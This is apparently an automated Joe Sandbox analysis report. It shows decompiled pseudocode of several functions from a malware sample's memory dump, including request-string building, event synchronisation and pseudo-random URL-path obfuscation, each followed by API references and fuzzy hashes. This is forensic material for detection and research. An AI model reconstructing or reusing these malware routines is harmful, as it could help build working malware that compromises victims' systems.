            					_t30 = E047E3CE0(_a4, _t43, _t46,  &_v48,  &_v8,  &_a16);
            					L5:
            					_a4 = _t30;
            					L6:
            					if(_a4 != 0) {
            						L9:
            						 *0x47ea2ec =  *0x47ea2ec + 1;
            						L10:
            						return _a4;
            					}
            					_t50 = _a16;
            					 *_t48 = _a16;
            					_t49 = _v8;
            					 *_t42 = E047E56B9(_t50, _t49);
            					_t34 = E047E77A5(_t49, _t50);
            					if(_t34 != 0) {
            						 *_a8 = _t49;
            						 *_a12 = _t34;
            						if( *0x47ea2ec < 5) {
            							 *0x47ea2ec =  *0x47ea2ec & 0x00000000;
            						}
            						goto L10;
            					}
            					_a4 = 0xbf;
            					E047E63F6();
            					HeapFree( *0x47ea2d8, 0, _t49);
            					goto L9;
            				}
            				_t51 =  *0x47ea3e0; // 0x5429c08
            				if(RtlAllocateHeap( *0x47ea2d8, 0, 0x800) == 0) {
            					_a4 = 8;
            					goto L6;
            				}
            				_t30 = E047E2B91(_a4, _t51,  &_v48,  &_v8,  &_a16, _t37);
            				goto L5;
            			}

            APIs
            • wsprintfA.USER32 ref: 047E35F4
            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 047E3619
              • Part of subcall function 047E2B91: GetTickCount.KERNEL32 ref: 047E2BA8
              • Part of subcall function 047E2B91: wsprintfA.USER32 ref: 047E2BF5
              • Part of subcall function 047E2B91: wsprintfA.USER32 ref: 047E2C12
              • Part of subcall function 047E2B91: wsprintfA.USER32 ref: 047E2C34
              • Part of subcall function 047E2B91: wsprintfA.USER32 ref: 047E2C5B
              • Part of subcall function 047E2B91: wsprintfA.USER32 ref: 047E2C7C
              • Part of subcall function 047E2B91: wsprintfA.USER32 ref: 047E2CA7
              • Part of subcall function 047E2B91: HeapFree.KERNEL32(00000000,?), ref: 047E2CBA
            • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 047E3693
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: wsprintf$Heap$Free$AllocateCountTick
            • String ID: Uet
            • API String ID: 1307794992-2766386878
            • Opcode ID: f6669da5961682b85cc138715e7646d2bf108688333cdebc4d1b5a8ea8e8300e
            • Instruction ID: eedd24bb13928021037134a6b8721f9a296daaa896148a79b888c2cd0c2b45e9
            • Opcode Fuzzy Hash: f6669da5961682b85cc138715e7646d2bf108688333cdebc4d1b5a8ea8e8300e
            • Instruction Fuzzy Hash: 3F314D72600108EBDB01DFA6D984AEA3BBCFB4C345F108622E901EB341D734A944DBA1
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 46%
            			E047E6CDF(intOrPtr* __eax) {
            				void* _v8;
            				WCHAR* _v12;
            				void* _v16;
            				char _v20;
            				void* _v24;
            				intOrPtr _v28;
            				void* _v32;
            				intOrPtr _v40;
            				short _v48;
            				intOrPtr _v56;
            				short _v64;
            				intOrPtr* _t54;
            				intOrPtr* _t56;
            				intOrPtr _t57;
            				intOrPtr* _t58;
            				intOrPtr* _t60;
            				void* _t61;
            				intOrPtr* _t63;
            				intOrPtr* _t65;
            				short _t67;
            				intOrPtr* _t68;
            				intOrPtr* _t70;
            				intOrPtr* _t72;
            				intOrPtr* _t75;
            				intOrPtr* _t77;
            				intOrPtr _t79;
            				intOrPtr* _t83;
            				intOrPtr* _t87;
            				intOrPtr _t103;
            				intOrPtr _t109;
            				void* _t118;
            				void* _t122;
            				void* _t123;
            				intOrPtr _t130;
            
            				_t123 = _t122 - 0x3c;
            				_push( &_v8);
            				_push(__eax);
            				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
            				if(_t118 >= 0) {
            					_t54 = _v8;
            					_t103 =  *0x47ea348; // 0xc3d5a8
            					_t5 = _t103 + 0x47eb038; // 0x3050f485
            					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
            					_t56 = _v8;
            					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
            					if(_t118 >= 0) {
            						__imp__#2(0x47e9284);
            						_v28 = _t57;
            						if(_t57 == 0) {
            							_t118 = 0x8007000e;
            						} else {
            							_t60 = _v32;
            							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
            							_t87 = __imp__#6;
            							_t118 = _t61;
            							if(_t118 >= 0) {
            								_t63 = _v24;
            								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
            								if(_t118 >= 0) {
            									_t130 = _v20;
            									if(_t130 != 0) {
            										_t67 = 3;
            										_v64 = _t67;
            										_v48 = _t67;
            										_v56 = 0;
            										_v40 = 0;
            										if(_t130 > 0) {
            											while(1) {
            												_t68 = _v24;
            												asm("movsd");
            												asm("movsd");
            												asm("movsd");
            												asm("movsd");
            												_t123 = _t123;
            												asm("movsd");
            												asm("movsd");
            												asm("movsd");
            												asm("movsd");
            												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
            												if(_t118 < 0) {
            													goto L16;
            												}
            												_t70 = _v8;
            												_t109 =  *0x47ea348; // 0xc3d5a8
            												_t28 = _t109 + 0x47eb0e4; // 0x3050f1ff
            												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
            												if(_t118 >= 0) {
            													_t75 = _v16;
            													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
            													if(_t118 >= 0 && _v12 != 0) {
            														_t79 =  *0x47ea348; // 0xc3d5a8
            														_t33 = _t79 + 0x47eb078; // 0x76006f
            														if(lstrcmpW(_v12, _t33) == 0) {
            															_t83 = _v16;
            															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
            														}
            														 *_t87(_v12);
            													}
            													_t77 = _v16;
            													 *((intOrPtr*)( *_t77 + 8))(_t77);
            												}
            												_t72 = _v8;
            												 *((intOrPtr*)( *_t72 + 8))(_t72);
            												_v40 = _v40 + 1;
            												if(_v40 < _v20) {
            													continue;
            												}
            												goto L16;
            											}
            										}
            									}
            								}
            								L16:
            								_t65 = _v24;
            								 *((intOrPtr*)( *_t65 + 8))(_t65);
            							}
            							 *_t87(_v28);
            						}
            						_t58 = _v32;
            						 *((intOrPtr*)( *_t58 + 8))(_t58);
            					}
            				}
            				return _t118;
            			}

            APIs
            • SysAllocString.OLEAUT32(047E9284), ref: 047E6D2F
            • lstrcmpW.KERNEL32(00000000,0076006F), ref: 047E6E10
            • SysFreeString.OLEAUT32(00000000), ref: 047E6E29
            • SysFreeString.OLEAUT32(?), ref: 047E6E58
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: String$Free$Alloclstrcmp
            • String ID:
            • API String ID: 1885612795-0
            • Opcode ID: 3cdd936822c7c48635eb1bb4557e557e005c4d6d101b97dabdcc4ab672bf19dc
            • Instruction ID: 38d9964df5459dcf5b565f1c2a152e02f714745bcdafa21a1c482f37a6bb8c94
            • Opcode Fuzzy Hash: 3cdd936822c7c48635eb1bb4557e557e005c4d6d101b97dabdcc4ab672bf19dc
            • Instruction Fuzzy Hash: 92512B75D00519EFCB01DFA9C8889AEB7BAFF8C704B148698E915EB350D731AD41CBA0
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SysAllocString.OLEAUT32(?), ref: 047E59B8
            • SysFreeString.OLEAUT32(00000000), ref: 047E5A9D
              • Part of subcall function 047E6CDF: SysAllocString.OLEAUT32(047E9284), ref: 047E6D2F
            • SafeArrayDestroy.OLEAUT32(00000000), ref: 047E5AF0
            • SysFreeString.OLEAUT32(00000000), ref: 047E5AFF
              • Part of subcall function 047E77E3: Sleep.KERNEL32(000001F4), ref: 047E782B
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: String$AllocFree$ArrayDestroySafeSleep
            • String ID:
            • API String ID: 3193056040-0
            • Opcode ID: a865d52ea5e135ff722db4454274316773df88ac871951a4b28f9d384e58cf66
            • Instruction ID: 396af864accc062d9ba1e8166234422c27628c5516bfb750b93c1f8faae5a853
            • Opcode Fuzzy Hash: a865d52ea5e135ff722db4454274316773df88ac871951a4b28f9d384e58cf66
            • Instruction Fuzzy Hash: 1A514B76500609BFDB11DFA9C888AAEBBB6FF8C704B148A29E505DB310DB35ED45CB50
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 85%
            			E047E4781(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
            				intOrPtr _v8;
            				intOrPtr _v12;
            				signed int _v16;
            				void _v156;
            				void _v428;
            				void* _t55;
            				unsigned int _t56;
            				signed int _t66;
            				signed int _t74;
            				void* _t76;
            				signed int _t79;
            				void* _t81;
            				void* _t92;
            				void* _t96;
            				signed int* _t99;
            				signed int _t101;
            				signed int _t103;
            				void* _t107;
            
            				_t92 = _a12;
            				_t101 = __eax;
            				_t55 = E047E61EF(_a16, _t92);
            				_t79 = _t55;
            				if(_t79 == 0) {
            					L18:
            					return _t55;
            				}
            				_t56 =  *(_t92 + _t79 * 4 - 4);
            				_t81 = 0;
            				_t96 = 0x20;
            				if(_t56 == 0) {
            					L4:
            					_t97 = _t96 - _t81;
            					_v12 = _t96 - _t81;
            					E047E6725(_t79,  &_v428);
            					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E047E7477(_t101,  &_v428, _a8, _t96 - _t81);
            					E047E7477(_t79,  &_v156, _a12, _t97);
            					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
            					_t66 = E047E6725(_t101, 0x47ea1d0);
            					_t103 = _t101 - _t79;
            					_a8 = _t103;
            					if(_t103 < 0) {
            						L17:
            						E047E6725(_a16, _a4);
            						E047E7894(_t79,  &_v428, _a4, _t97);
            						memset( &_v428, 0, 0x10c);
            						_t55 = memset( &_v156, 0, 0x84);
            						goto L18;
            					}
            					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
            					do {
            						if(_v8 != 0xffffffff) {
            							_push(1);
            							_push(0);
            							_push(0);
            							_push( *_t99);
            							L047E82DA();
            							_t74 = _t66 +  *(_t99 - 4);
            							asm("adc edx, esi");
            							_push(0);
            							_push(_v8 + 1);
            							_push(_t92);
            							_push(_t74);
            							L047E82D4();
            							if(_t92 > 0 || _t74 > 0xffffffff) {
            								_t74 = _t74 | 0xffffffff;
            								_v16 = _v16 & 0x00000000;
            							}
            						} else {
            							_t74 =  *_t99;
            						}
            						_t106 = _t107 + _a8 * 4 - 0x1a8;
            						_a12 = _t74;
            						_t76 = E047E5F09(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
            						while(1) {
            							 *_t99 =  *_t99 - _t76;
            							if( *_t99 != 0) {
            								goto L14;
            							}
            							L13:
            							_t92 =  &_v156;
            							if(E047E6E71(_t79, _t92, _t106) < 0) {
            								break;
            							}
            							L14:
            							_a12 = _a12 + 1;
            							_t76 = E047E10A0(_t79,  &_v156, _t106, _t106);
            							 *_t99 =  *_t99 - _t76;
            							if( *_t99 != 0) {
            								goto L14;
            							}
            							goto L13;
            						}
            						_a8 = _a8 - 1;
            						_t66 = _a12;
            						_t99 = _t99 - 4;
            						 *(0x47ea1d0 + _a8 * 4) = _t66;
            					} while (_a8 >= 0);
            					_t97 = _v12;
            					goto L17;
            				}
            				while(_t81 < _t96) {
            					_t81 = _t81 + 1;
            					_t56 = _t56 >> 1;
            					if(_t56 != 0) {
            						continue;
            					}
            					goto L4;
            				}
            				goto L4;
            			}

            APIs
            • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 047E4834
            • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 047E484A
            • memset.NTDLL ref: 047E48F3
            • memset.NTDLL ref: 047E4909
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: memset$_allmul_aulldiv
            • String ID:
            • API String ID: 3041852380-0
            • Opcode ID: f8a4ed9de0b3476b6e99384d5ade1b65235b62d78e3913b92d13e7e45939b5a9
            • Instruction ID: 12e2b08a941a14483a1dc750b8c76945f60fc942df0b9ff0b049be5c5d2a67c2
            • Opcode Fuzzy Hash: f8a4ed9de0b3476b6e99384d5ade1b65235b62d78e3913b92d13e7e45939b5a9
            • Instruction Fuzzy Hash: F241B271A00219AFEB109F6ADC44BFE7779EF49314F004669E909A7381EB70BE45CB91
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 87%
            			E047E49D0(signed int _a4, signed int* _a8) {
            				void* __ecx;
            				void* __edi;
            				signed int _t6;
            				intOrPtr _t8;
            				intOrPtr _t12;
            				short* _t19;
            				void* _t25;
            				signed int* _t28;
            				CHAR* _t30;
            				long _t31;
            				intOrPtr* _t32;
            
            				_t6 =  *0x47ea310; // 0xd448b889
            				_t32 = _a4;
            				_a4 = _t6 ^ 0x109a6410;
            				_t8 =  *0x47ea348; // 0xc3d5a8
            				_t3 = _t8 + 0x47eb7b4; // 0x61636f4c
            				_t25 = 0;
            				_t30 = E047E74EC(_t3, 1);
            				if(_t30 != 0) {
            					_t25 = CreateEventA(0x47ea34c, 1, 0, _t30);
            					E047E61DA(_t30);
            				}
            				_t12 =  *0x47ea2fc; // 0x2000000a
            				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E047E30D5() != 0) {
            					L12:
            					_t28 = _a8;
            					if(_t28 != 0) {
            						 *_t28 =  *_t28 | 0x00000001;
            					}
            					_t31 = E047E37DF(_t32, 0);
            					if(_t31 == 0 && _t25 != 0) {
            						_t31 = WaitForSingleObject(_t25, 0x4e20);
            					}
            					if(_t28 != 0 && _t31 != 0) {
            						 *_t28 =  *_t28 & 0xfffffffe;
            					}
            					goto L20;
            				} else {
            					_t19 =  *0x47ea124( *_t32, 0x20);
            					if(_t19 != 0) {
            						 *_t19 = 0;
            						_t19 = _t19 + 2;
            					}
            					_t31 = E047E23C4(0,  *_t32, _t19, 0);
            					if(_t31 == 0) {
            						if(_t25 == 0) {
            							L22:
            							return _t31;
            						}
            						_t31 = WaitForSingleObject(_t25, 0x4e20);
            						if(_t31 == 0) {
            							L20:
            							if(_t25 != 0) {
            								CloseHandle(_t25);
            							}
            							goto L22;
            						}
            					}
            					goto L12;
            				}
            			}

            0x047e49d1
            0x047e49d8
            0x047e49e2
            0x047e49e6
            0x047e49ec
            0x047e49fb
            0x047e4a02
            0x047e4a06
            0x047e4a18
            0x047e4a1a
            0x047e4a1a
            0x047e4a1f
            0x047e4a26
            0x047e4a7d
            0x047e4a7d
            0x047e4a83
            0x047e4a85
            0x047e4a85
            0x047e4a8f
            0x047e4a93
            0x047e4aa5
            0x047e4aa5
            0x047e4aa9
            0x047e4aaf
            0x047e4aaf
            0x00000000
            0x047e4a3f
            0x047e4a44
            0x047e4a4c
            0x047e4a50
            0x047e4a54
            0x047e4a54
            0x047e4a61
            0x047e4a65
            0x047e4a69
            0x047e4abe
            0x047e4ac4
            0x047e4ac4
            0x047e4a77
            0x047e4a7b
            0x047e4ab2
            0x047e4ab4
            0x047e4ab7
            0x047e4ab7
            0x00000000
            0x047e4ab4
            0x047e4a7b
            0x00000000
            0x047e4a65

            APIs
              • Part of subcall function 047E74EC: lstrlen.KERNEL32(00000005,00000000,43175AC3,00000027,00000000,05429E00,00000000,?,?,43175AC3,00000005,047EA00C,4D283A53,?,?), ref: 047E7522
              • Part of subcall function 047E74EC: lstrcpy.KERNEL32(00000000,00000000), ref: 047E7546
              • Part of subcall function 047E74EC: lstrcat.KERNEL32(00000000,00000000), ref: 047E754E
            • CreateEventA.KERNEL32(047EA34C,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,047E6A95,?,?,?), ref: 047E4A11
              • Part of subcall function 047E61DA: RtlFreeHeap.NTDLL(00000000,00000000,047E6383,00000000,?,00000000,00000000), ref: 047E61E6
            • WaitForSingleObject.KERNEL32(00000000,00004E20,047E6A95,00000000,00000000,?,00000000,?,047E6A95,?,?,?), ref: 047E4A71
            • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,047E6A95,?,?,?), ref: 047E4A9F
            • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,047E6A95,?,?,?), ref: 047E4AB7
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
            • String ID:
            • API String ID: 73268831-0
            • Opcode ID: d0aed7533a46b5aee1deac40b60dacb684ceb08d78a967a74756d806f10faf95
            • Instruction ID: 0d388824017456f43a5418725399e7e8b723e0f6fa6df65b8741ef7b4f5cb140
            • Opcode Fuzzy Hash: d0aed7533a46b5aee1deac40b60dacb684ceb08d78a967a74756d806f10faf95
            • Instruction Fuzzy Hash: E621E4736003119BD7319A6B9C48ABB77E9EB8CB24B054725FE41EB341DB24FC009758
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 39%
            			E047E69E6(void* __ecx, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
            				intOrPtr _v12;
            				void* _v16;
            				void* _v28;
            				char _v32;
            				void* __esi;
            				void* _t29;
            				void* _t38;
            				signed int* _t39;
            				void* _t40;
            
            				_t36 = __ecx;
            				_v32 = 0;
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				_v12 = _a4;
            				_t38 = E047E2A3D(__ecx,  &_v32);
            				if(_t38 != 0) {
            					L12:
            					_t39 = _a8;
            					L13:
            					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
            						_t23 =  &(_t39[1]);
            						if(_t39[1] != 0) {
            							E047E28B3(_t23);
            						}
            					}
            					return _t38;
            				}
            				if(E047E6ADC(0x40,  &_v16) != 0) {
            					_v16 = 0;
            				}
            				_t40 = CreateEventA(0x47ea34c, 1, 0,  *0x47ea3e4);
            				if(_t40 != 0) {
            					SetEvent(_t40);
            					Sleep(0xbb8);
            					CloseHandle(_t40);
            				}
            				_push( &_v32);
            				if(_a12 == 0) {
            					_t29 = E047E5704(_t36);
            				} else {
            					_push(0);
            					_push(0);
            					_push(0);
            					_push(0);
            					_push(0);
            					_t29 = E047E4C94(_t36);
            				}
            				_t41 = _v16;
            				_t38 = _t29;
            				if(_v16 != 0) {
            					E047E7220(_t41);
            				}
            				if(_t38 != 0) {
            					goto L12;
            				} else {
            					_t39 = _a8;
            					_t38 = E047E49D0( &_v32, _t39);
            					goto L13;
            				}
            			}

            0x047e69e6
            0x047e69f3
            0x047e69f9
            0x047e69fa
            0x047e69fb
            0x047e69fc
            0x047e69fd
            0x047e6a01
            0x047e6a0d
            0x047e6a11
            0x047e6a99
            0x047e6a99
            0x047e6a9c
            0x047e6a9e
            0x047e6aa6
            0x047e6aac
            0x047e6aaf
            0x047e6aaf
            0x047e6aac
            0x047e6aba
            0x047e6aba
            0x047e6a24
            0x047e6a26
            0x047e6a26
            0x047e6a3d
            0x047e6a41
            0x047e6a44
            0x047e6a4f
            0x047e6a56
            0x047e6a56
            0x047e6a5f
            0x047e6a63
            0x047e6a71
            0x047e6a65
            0x047e6a65
            0x047e6a66
            0x047e6a67
            0x047e6a68
            0x047e6a69
            0x047e6a6a
            0x047e6a6a
            0x047e6a76
            0x047e6a79
            0x047e6a7d
            0x047e6a7f
            0x047e6a7f
            0x047e6a86
            0x00000000
            0x047e6a88
            0x047e6a88
            0x047e6a95
            0x00000000
            0x047e6a95

            APIs
            • CreateEventA.KERNEL32(047EA34C,00000001,00000000,00000040,?,?,746AF710,00000000,746AF730), ref: 047E6A37
            • SetEvent.KERNEL32(00000000), ref: 047E6A44
            • Sleep.KERNEL32(00000BB8), ref: 047E6A4F
            • CloseHandle.KERNEL32(00000000), ref: 047E6A56
              • Part of subcall function 047E5704: WaitForSingleObject.KERNEL32(00000000,?,?,?,047E6A76,?,047E6A76,?,?,?,?,?,047E6A76,?), ref: 047E57DE
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: Event$CloseCreateHandleObjectSingleSleepWait
            • String ID:
            • API String ID: 2559942907-0
            • Opcode ID: 8e4796501219064b5a71a08952a6c7e74c8f04799d5e73bcc653dbc2cfa3db5c
            • Instruction ID: cded6844e217626dbb04b76b8c6390e931ba7249fcbcb83a9d85c41939802ce6
            • Opcode Fuzzy Hash: 8e4796501219064b5a71a08952a6c7e74c8f04799d5e73bcc653dbc2cfa3db5c
            • Instruction Fuzzy Hash: B82144B3D00119ABDB30AFE798888FE77ADDB1C214B458629EA11A7300D635B9559790
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 78%
            			E047E4461(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
            				intOrPtr _v8;
            				void* _v12;
            				void* _v16;
            				intOrPtr _t26;
            				intOrPtr* _t28;
            				intOrPtr _t31;
            				intOrPtr* _t32;
            				void* _t39;
            				int _t46;
            				intOrPtr* _t47;
            				int _t48;
            
            				_t47 = __eax;
            				_push( &_v12);
            				_push(__eax);
            				_t39 = 0;
            				_t46 = 0;
            				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
            				_v8 = _t26;
            				if(_t26 < 0) {
            					L13:
            					return _v8;
            				}
            				if(_v12 == 0) {
            					Sleep(0xc8);
            					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
            				}
            				if(_v8 >= _t39) {
            					_t28 = _v12;
            					if(_t28 != 0) {
            						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
            						_v8 = _t31;
            						if(_t31 >= 0) {
            							_t46 = lstrlenW(_v16);
            							if(_t46 != 0) {
            								_t46 = _t46 + 1;
            								_t48 = _t46 + _t46;
            								_t39 = E047E33DC(_t48);
            								if(_t39 == 0) {
            									_v8 = 0x8007000e;
            								} else {
            									memcpy(_t39, _v16, _t48);
            								}
            								__imp__#6(_v16);
            							}
            						}
            						_t32 = _v12;
            						 *((intOrPtr*)( *_t32 + 8))(_t32);
            					}
            					 *_a4 = _t39;
            					 *_a8 = _t46 + _t46;
            				}
            				goto L13;
            			}

            0x047e446d
            0x047e4471
            0x047e4472
            0x047e4473
            0x047e4475
            0x047e4477
            0x047e447a
            0x047e447f
            0x047e4516
            0x047e451d
            0x047e451d
            0x047e4488
            0x047e448f
            0x047e449f
            0x047e449f
            0x047e44a5
            0x047e44a7
            0x047e44ac
            0x047e44b5
            0x047e44bb
            0x047e44c0
            0x047e44cb
            0x047e44cf
            0x047e44d1
            0x047e44d2
            0x047e44db
            0x047e44df
            0x047e44f0
            0x047e44e1
            0x047e44e6
            0x047e44eb
            0x047e44fa
            0x047e44fa
            0x047e44cf
            0x047e4500
            0x047e4506
            0x047e4506
            0x047e450f
            0x047e4514
            0x047e4514
            0x00000000

            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: FreeSleepStringlstrlenmemcpy
            • String ID:
            • API String ID: 1198164300-0
            • Opcode ID: c215924a569eb458ab662e52e73b85786ee4f9cb56dd64a8613184af6d8f6c5b
            • Instruction ID: a4d539844c1de1c05179a6207c28f02a1abf909e394fca3182a095cd3b344035
            • Opcode Fuzzy Hash: c215924a569eb458ab662e52e73b85786ee4f9cb56dd64a8613184af6d8f6c5b
            • Instruction Fuzzy Hash: 712132B5A00209EFDB11DFA5D9889EEBBB5FF4D314B108269E905E7300EB34EA01CB50
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 68%
            			E047E2708(unsigned int __eax, void* __ecx) {
            				void* _v8;
            				void* _v12;
            				signed int _t21;
            				signed short _t23;
            				char* _t27;
            				void* _t29;
            				void* _t30;
            				unsigned int _t33;
            				void* _t37;
            				unsigned int _t38;
            				void* _t41;
            				void* _t42;
            				int _t45;
            				void* _t46;
            
            				_t42 = __eax;
            				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
            				_t38 = __eax;
            				_t30 = RtlAllocateHeap( *0x47ea2d8, 0, (__eax >> 3) + __eax + 1);
            				_v12 = _t30;
            				if(_t30 != 0) {
            					_v8 = _t42;
            					do {
            						_t33 = 0x18;
            						if(_t38 <= _t33) {
            							_t33 = _t38;
            						}
            						_t21 =  *0x47ea2f0; // 0x8fa6e5a0
            						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
            						 *0x47ea2f0 = _t23;
            						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
            						memcpy(_t30, _v8, _t45);
            						_v8 = _v8 + _t45;
            						_t27 = _t30 + _t45;
            						_t38 = _t38 - _t45;
            						_t46 = _t46 + 0xc;
            						 *_t27 = 0x2f;
            						_t13 = _t27 + 1; // 0x1
            						_t30 = _t13;
            					} while (_t38 > 8);
            					memcpy(_t30, _v8, _t38 + 1);
            				}
            				return _v12;
            			}

            0x047e2710
            0x047e2713
            0x047e2719
            0x047e2731
            0x047e2733
            0x047e2738
            0x047e273a
            0x047e273d
            0x047e273f
            0x047e2742
            0x047e2744
            0x047e2744
            0x047e2746
            0x047e2751
            0x047e2756
            0x047e2767
            0x047e276f
            0x047e2774
            0x047e2777
            0x047e277a
            0x047e277c
            0x047e277f
            0x047e2782
            0x047e2782
            0x047e2785
            0x047e2790
            0x047e2795
            0x047e279f

            APIs
            • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,047E6708,00000000,?,76B5C740,047E3ECE,00000000,05429600), ref: 047E2713
            • RtlAllocateHeap.NTDLL(00000000,?), ref: 047E272B
            • memcpy.NTDLL(00000000,05429600,-00000008,?,?,?,047E6708,00000000,?,76B5C740,047E3ECE,00000000,05429600), ref: 047E276F
            • memcpy.NTDLL(00000001,05429600,00000001,047E3ECE,00000000,05429600), ref: 047E2790
            Memory Dump Source
